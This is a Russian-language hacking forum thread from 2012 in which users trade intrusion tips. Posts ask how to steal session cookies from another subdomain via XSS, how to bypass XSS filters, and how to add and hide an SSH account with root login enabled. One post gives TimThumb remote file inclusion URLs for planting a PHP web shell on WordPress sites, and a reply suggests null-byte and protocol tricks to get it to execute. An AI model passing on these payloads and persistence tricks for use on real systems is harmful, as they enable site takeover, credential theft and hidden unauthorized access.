HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #20801  
Старый 10.06.2012, 02:51
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
С нами: 9625938

Репутация: 32
По умолчанию

Возможно ли с помощью XSS получить куки с другого под домена?

(need.site.com)

В данной ситуации :

Цитата:
Сообщение от None  
.site.com PHPSID=*****************
xss.site.com PHPSID=2****************
need.site.com PHPSID=3****************; login=123; pass=123
 
Ответить с цитированием

  #20802  
Старый 12.06.2012, 07:20
4otkii
Новичок
Регистрация: 19.09.2010
Сообщений: 1
С нами: 8234966

Репутация: 0
По умолчанию

Здравствуйте, возможно ли обойти фильтр XSS если никакие символы не фильтруются, кроме как если за "
 
Ответить с цитированием

  #20803  
Старый 12.06.2012, 19:58
Groove
Участник форума
Регистрация: 13.11.2010
Сообщений: 184
С нами: 8155766

Репутация: 2
По умолчанию

Как создать учетную запись в ssh срочно !
 
Ответить с цитированием

  #20804  
Старый 12.06.2012, 20:01
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от Groove  
Как создать учетную запись в ssh срочно !
sudo useradd noob

sudo passwd noob

***** (тут пасс)
 
Ответить с цитированием

  #20805  
Старый 12.06.2012, 20:08
Groove
Участник форума
Регистрация: 13.11.2010
Сообщений: 184
С нами: 8155766

Репутация: 2
По умолчанию

Цитата:
Сообщение от Konqi  
sudo useradd noob
sudo passwd noob
***** (тут пасс)
куда это прописывать ?
 
Ответить с цитированием

  #20806  
Старый 12.06.2012, 20:09
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от Groove  
куда это прописывать ?
что значит куда? у тя же терминал открытый через ssh, вводи эти команды под рутом

если ты имеешь ввиду создание пользователя у которого будет доступ к ssh, то по дефолту у всех пользователей кроме рута есть доступ к ssh, чтобы работать под рутом поправь файл

/etc/ssh/sshd_config

PermitRootLogin no -> PermitRootLogin yes
 
Ответить с цитированием

  #20807  
Старый 12.06.2012, 20:35
Groove
Участник форума
Регистрация: 13.11.2010
Сообщений: 184
С нами: 8155766

Репутация: 2
По умолчанию

Цитата:
Сообщение от Konqi  
что значит куда? у тя же терминал открытый через ssh, вводи эти команды под рутом
если ты имеешь ввиду создание пользователя у которого будет доступ к ssh, то по дефолту у всех пользователей кроме рута есть доступ к ssh, чтобы работать под рутом поправь файл
/etc/ssh/sshd_config
PermitRootLogin
no
-> PermitRootLogin
yes
А как спрятать учетку ?
 
Ответить с цитированием

  #20808  
Старый 12.06.2012, 20:39
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от Groove  
А как спрятать учетку ?
спрятать от кого или от чего?

в /etc/passwd все равно палится учетка

Код:
cat /etc/passwd  | awk -F: '{print $1}'
 
Ответить с цитированием

  #20809  
Старый 13.06.2012, 01:38
promarketing
Новичок
Регистрация: 05.08.2011
Сообщений: 14
С нами: 7774166

Репутация: 0
По умолчанию

Word press TimThumb Уязвимость

/wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.php (или shell.php4 shell.php%00) даёт error 503 Service temporary unavailable

Всё остальное успешно инклудится и появляется в cache папке - shell.php%20 shell.gif но не работает как php файл

Есть решение? вроде возможно т.к пару чужих .php файлов в папке cache уже есть
 
Ответить с цитированием

  #20810  
Старый 13.06.2012, 02:20
Faaax
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами: 8263766

Репутация: 11
По умолчанию

а ты пробовал blabla.php%00.jpg , или через temper data?

или так же заместо http://yousite.com/shell.php

так https://yousite.com/shell.php,ftp://yousite.com/shell.php?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.